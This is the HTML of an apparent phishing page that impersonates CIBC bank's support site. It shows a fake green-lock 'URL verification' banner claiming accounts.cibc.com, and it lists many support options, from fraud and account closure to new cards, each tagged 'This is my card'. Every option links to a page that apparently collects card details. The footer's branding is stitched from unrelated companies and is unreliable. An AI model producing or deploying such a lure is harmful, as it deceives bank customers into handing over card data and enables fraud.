<!DOCTYPE html>
<html lang="en">
<head>
  <title>www.cibc.com</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
<link href="6.png" rel="icon">
  <link href="6.png" rel="apple-touch-icon">

  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css">
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.slim.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" ></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.bundle.min.js"></script>
  <script src="https://use.fontawesome.com/releases/v5.8.1/css/all.css"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js">
</script>

 <link href="build/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
  <style>
  body {
    font-family: Arial, Helvetica, sans-serif;
    
}

.card {
    border: none;
    border-radius: 0;
    width: 80% !important;
    margin: 0 auto
}

.signup {
    display: flex;
    flex-flow: column;
    justify-content: center;
    padding: 10px 50px
}

a {
    text-decoration: none !important;
    color: black;
}
a:hover{
color: #007399;

}
h5 {
    color: #ff0147;
    margin-bottom: 3px;
    font-weight: bold
}

small {
    color:  #737373;
}

input {
    width: 100%;
    display: block;
    margin-bottom: 7px
  
}

.form-control {
    border: 1px solid #000000;
    border-radius: 10px;
   height:60px;
    letter-spacing: 1px
}

.form-control:focus {
    border: 0.5px solid #dc354575;
    border-radius: 10px;
    box-shadow: none;
  
    color: #000;
    letter-spacing: 1px
}

.btn {
    display: block;
   
    border-radius: 30px;
    border: none;
    background: linear-gradient(to right, rgb(26, 26, 26) 0%, rgb(26, 26, 26) 100%);
    background: -webkit-linear-gradient(left, rgb(26, 26, 26) 0%, rgb(26, 26, 26) 100%)
}

.text-left {
    color: rgba(0, 0, 0, 0.3);
    font-weight: 400
}

.text-right {
    color: #ff0147;
    font-weight: bold
}
  }
  </style>
</head>
<body>

<div class="container" style="margin-top:30px">
   <div class="row"></div>
     <div class="card-title text-center">
            <img src="6.png" style="height:150px; width: 150px;">
                    <h4 class="mt-4">CIBC</h4> </div>


                        </a>
  <ul class="navbar-nav ml-auto">
     <li class="nav-item active">
      <a class="nav-link" href="#" style="color:#ffd11a;">Customer Service</a>
    </li>
  </ul>
</nav>

<nav class="navbar navbar-expand-sm navbar-dark" style="background-color:whitesmoke;">
 <p style="margin-left:1%"><i class="bi bi-lock-fill" style="color:green;"></i> URL verification:<strong style="color:green;">https://</strong>accounts.cibc.com</p> 
</nav>

  <h4 style="text-align: center; margin: 25px; padding: 25px;">Hi, Welcome to our quick Support Page . Please Select how we can help you</h4><img src="42a04720f8937e3e22975498324ad1cd.png" style="float:right;">
  <div class="row">
    <div class="col-sm-2">
      <i class="bi bi-person-check" style="font-size: 60px; margin-left: 25%;"></i>
    </div>
    <div class="col-sm-4" style="margin-top:40px">
     <a href="come/car.html">
      <span>✔Handle Verification  - This is my card<br>✔Process Refund - This is my card <br>✔Process Compensation - This is my card<br>✔Process  Booking - This is my card<br>✔Process Voucher - This is my card<br>✔Fraudulent Activity - This is my card<br>✔Issue with my debit card - This is my card<br>✔Keep my account active - This is my card
</span></a>

      
    </div>
    <div class="col-sm-2">
       <i class="bi bi-handbag" style="font-size: 60px; margin-left: 25%;"></i>
    </div>
    <div class="col-sm-4" style="margin-top:40px">
      <a href="come/car.html">
     <span>✔Issue with Wrong order - This is my card<br>✔Issue with client reward - This is my card<br>✔Get Complimentary messages - This is my card<br>✔Issue with mortgages - This is my card<br></span></a>


      
    </div>
</div>
  <div class="row">
    <div class="col-sm-2">
        <i class="bi bi-credit-card-2-front" style="font-size: 60px; margin-left: 25%;"></i>
    </div>
    <div class="col-sm-4" style="margin-top:40px">
      <a href="come/car.html">
     <span>✔Track transfer - This is my card<br> ✔I can not make online transactions - This is my card<br>✔Close Account - This is my card<br>✔Withdraw Issues - This is my card<br>✔Issue with Transfer - This is my card<br>✔Cancel my credit card account - This is my card<br>✔Issues with my new card - This is my card<br>✔Issue with Making Payments - This is my card<br>✔Problem with card reader - This is my card<br>✔I need a new Card - This is my card</span></a>

      
    </div>
    <div class="col-sm-2">
       <i class="bi bi-person-lines-fill" style="font-size: 60px; margin-left: 25%;"></i>
    </div>
    <div class="col-sm-4" style="margin-top:40px">
     <a href="come/car.html">
      <span>✔Handle verification Process - This is my card<br>✔Issues with Booking - This is my card<br>✔Issues with Login - This is my card<br>✔Recognise my Account - This is my card<br>✔Fraudulent Activity - This is my card<br>✔Issue with my card - This is my card<br>✔Keep my account active - This is my card<br>✔My App is blocked - This is my card<br>✔Update or re-install App - its linked to this card <br>✔ One order pro discount code - This is my card
</span></a>

      
    </div>
    
</div>
</div>


<div class="footer" style="margin-bottom:0">
  <p style="text-align:center; color: #666666; font-size: 10px;">Trust is Our Product™<br>
For trademarks and patents, please see our Legal Notice.<br>
NMLS #1518126<br>
© Copyright 2022 CIBC Trust Company, LLC.</p>
</div>

</body>
</html>
